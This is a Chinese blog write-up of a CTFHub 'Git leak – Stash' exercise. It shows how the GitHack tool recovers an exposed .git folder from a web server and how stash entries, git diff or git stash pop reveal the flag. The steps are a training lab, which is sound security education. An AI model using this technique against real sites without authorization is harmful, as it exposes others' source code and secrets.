CTFHUB-技能树-Git泄露-Stash

2023-7-31

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题

工具

步骤

  • 获取工具,
git clone https://github.com/BugScanTeam/GitHack.git
  • 获取工具--反代
git clone https://github.bravexist.cn/https://github.com/BugScanTeam/GitHack.git
  • 使用工具处理git泄露情况,记得添加端口号
python2 GitHack.py <url>(url格式:http(s)://XXX/.git/)
  •  查看结果
cd dist
cd xxxx
ls -a ./git
  • 法一:进入.git/refs 目录
cat stash
  •  使用git diff  来查看 flag
git diff xxxx
  •  法二:执行 
    git stash pop

    得到的txt文件里就是flag

 

版权声明:
作者:qiankong
链接:https://bravexist.cn/2023/07/ctfhub-git-leak-stash.html
文章版权归作者所有,未经允许请勿转载。
THE END
CTFHUB-技能树-Git泄露-Log
<<上一篇
他人世界末——抑或是你的(剧透慎入)
下一篇>>
相关推荐
CTFHUB-技能树-Git泄露-Index
CTFHUB-技能树-Git泄露-Stash
CTFHUB-技能树-Git泄露-Log
Copyright © 2025 一世贪欢的私域 CoreNext Powered by WordPress
本站支持SSL安全访问